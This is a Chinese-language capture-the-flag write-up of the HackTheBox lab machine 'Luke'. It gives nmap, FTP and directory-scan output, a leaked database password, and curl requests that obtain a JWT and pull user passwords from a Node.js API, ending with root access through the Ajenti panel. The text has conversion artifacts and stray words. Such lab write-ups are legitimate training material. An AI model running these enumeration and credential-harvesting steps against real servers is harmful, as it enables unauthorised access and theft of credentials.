教你如何把HackTheBox裏面的Luke「幹掉」
與往常同樣,第一步是對主機進行Nmap識別正在運行的服務:php
`Nmap scan report for 10.10.10.137 Host is up (0.042s latency). Not shown: 65464 closed ports, 66 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.13.75 | Logged in as ftp | TYPE: ASCII | No session upload bandwidth limit | No session download bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3+ (ext.1) - secure, fast, stable |_End of status 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3 |_http-title: Luke 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). 8000/tcp open http Ajenti http control panel |_http-title: Ajenti No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853 OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0% OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7( OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0 OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S) Network Distance: 2 hops TRACEROUTE (using port 587/tcp) HOP RTT ADDRESS 1 40.68 ms 10.10.12.1 2 40.94 ms 10.10.10.137 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds` * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * 11 * 12 * 13 * 14 * 15 * 16 * 17 * 18 * 19 * 20 * 21 * 22 * 23 * 24 * 25 * 26 * 27 * 28 * 29 * 30 * 31 * 32 * 33 * 34 * 35 * 36 * 37 * 38 * 39 * 40 * 41 * 42 * 43 * 44 * 45 * 46 * 47 * 48 * 49 * 50 * 51 * 52 * 53
從該輸出中咱們能夠看到有不少開放的端口。我看到的第一個是FTP,由於它容許匿名登陸。css
`root@kali:~/Documents/luke# ncftp 10.10.10.137 NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/). Connecting to 10.10.10.137... vsFTPd 3.0.3+ (ext.1) ready... Logging in... Login successful. Logged in to 10.10.10.137. ncftp / > ls webapp/ ncftp / > cd webapp/ Directory successfully changed. ncftp /webapp > ls for_Chihiro.txt ncftp /webapp > cat for_Chihiro.txt Dear Chihiro !! As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created . Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! Derry ncftp /webapp >` * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * 11 * 12 * 13 * 14 * 15 * 16 * 17 * 18 * 19 * 20 * 21 * 22 * 23
如您所見,經過FTP託管了一個文件。這是給千尋人的txt文件。這彷佛是FTP上全部可用的東西。接下來,我決定移至端口80。瀏覽至10.10.10.137以查看託管的內容。
向我介紹了基本的Bootstrap 4頁。源代碼中沒有隱藏任何內容,頁面外也沒有連接。而後,我運行dirb來查找服務器上託管的其餘目錄和文件。html
`root@kali:~/Documents/luke# dirb http://10.10.10.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/
---- Entering directory: http://10.10.10.137/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3`
* 1
* 2
* 3
* 4
* 5
* 6
* 7
* 8
* 9
* 10
* 11
* 12
* 13
* 14
* 15
* 16
* 17
* 18
* 19
* 20
* 21
* 22
* 23
* 24
* 25
* 26
* 27
* 28
* 29
* 30
* 31
* 32
* 33
* 34
* 35
* 36
* 37
* 38
* 39
* 40
* 41
* 42
* 43
發現了目錄的集合。我還使用dirbuster從新掃描並找到了/login.php和config.php。因爲某種緣由而被dirb搶走了。
當我瀏覽到config.php時,將返回如下內容:mysql
`$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %sn". $conn -> error);`
* 1
如今,咱們有了一個用戶名和密碼的根:Zk6heYCyv6ZE9Xcg。/管理是發現的其餘重要外觀之一。當您瀏覽至此時,將顯示HTTP基自己份驗證字段。目前在端口80上彷佛沒有其餘任何東西。所以,我隨後移至端口3000。linux
當您嘗試鏈接到它時,您會收到JSON響應:大約3000彷佛是託管NodeJS應用的主機。web
`{"success":false,"message":"Auth token is not supplied"}`
* 1
我在端口3000上運行dirb嘗試查找其餘內容。sql
`DirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Tue Aug 13 11:36:44 BST 2019 -------------------------------- http://10.10.10.137:3000 -------------------------------- Directories found during testing: Dirs found with a 200 response: /login/ /users/ / /Login/ /users/admin/ /Users/ /Users/admin/ /users/Admin/ /Users/Admin/ /LogIn/ /LOGIN/ -------------------------------- --------------------------------` * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * 11 * 12 * 13 * 14 * 15 * 16 * 17 * 18 * 19 * 20 * 21 * 22 * 23 * 24 * 25 * 26
全部這些目錄返回的JSON響應與原始目錄很是類似,代表您須要進行身份驗證。經過一番調查,我發現該應用程序正在使用JSON Web令牌。經過向身份驗證服務器發送包含正確的用戶名和密碼的請求。服務器將使用令牌進行響應,而後可使用令牌對應用程序進行身份驗證。通過大量的試驗和錯誤後,我可使用如下串行生成令牌請求:json
`root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#`
* 1
* 2
如您所見,我使用CURL將POST請求發送到http://10.10.10.137:3000/login。POST請求中包含在端口80上找到的用戶名和密碼。服務器以令牌密碼響應。而後,我使用curl將令牌轉發給應用程序。瀏覽器
`root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000
{"message":"Welcome admin ! "}
root@kali:/#`
* 1
* 2
* 3
發送後,服務器將顯示消息「歡迎管理員!」。而後,我將同一令牌發送到與dirb找到的端口3000上的其餘目錄。bash
`root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/#
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}`
* 1
* 2
* 3
* 4
* 5
您能夠看到/ users目錄響應了一個用戶名。管理員,德里,尤里和多莉。/users / admin目錄以Admin的用戶名和密碼做爲響應。管理員:WX5b7)> / rp $ U) FW。而後,我將令牌發送給/ users中的3個用戶。
`root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}`
* 1
* 2
* 3
* 4
* 5
* 6
因此畢竟,我有5套憑證
- Dory:5y:!xa = ybfe)/ QD
- Yuri:bet @ tester87
- Derry:rZ86wwLvx7jUxtch
- Admin:WX5b7)> / rp $ U)FW
- root:Zk6heYCyv6ZE9Xcg
我回到端口80上的/管理,依次嘗試了每一個時間表。Derry用戶可以登陸。從這裏,咱們有一個目錄,列出了3個不一樣的文件。Config.json,config.php和login.php 。我打開config.json並顯示如下內容:
您能夠今後JSON輸出中看到,咱們如今有了另外一個root用戶密碼。而後,我繼續探索8000端口。
這是用於管理服務器的軟件。我嘗試使用前面的步驟中捕獲的6組替換登陸。來自config.json的root登陸名容許我登陸到該頁面。
而後在計算機上生成Web瀏覽器終端會話。有了該終端的訪問權限,我即可以將user.txt和root.txt都保存起來以完成計算機。
# cd /root
相關文章
- 1. 教你如何把HackTheBox裏面的Luke「幹掉」
- 2. 「幹掉」HackTheBox裏面的Writeup
- 3. 教你如何幹掉你代碼中的一坨if-else
- 4. 教你如何把WebStorm紅色小波浪給去掉
- 5. 手把手教你如何快速發表論文(乾貨)
- 6. 如何幹掉360殺毒的進程
- 7. 如何幹掉噁心的 SQL 注入?
- 8. Java8的Optional:如何幹掉空指針?
- 9. Neo4J是如何幹掉OrientDB、Titan的
- 10. 如何幹掉知乎的所有DIV
- 更多相關文章...
- • 如何幹擾TCP數據傳輸? - TCP/IP教程
- • XSD 如何使用? - XML Schema 教程
- • 再有人問你分佈式事務,把這篇扔給他
- • 使用阿里雲OSS+CDN部署前端頁面與加速靜態資源
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
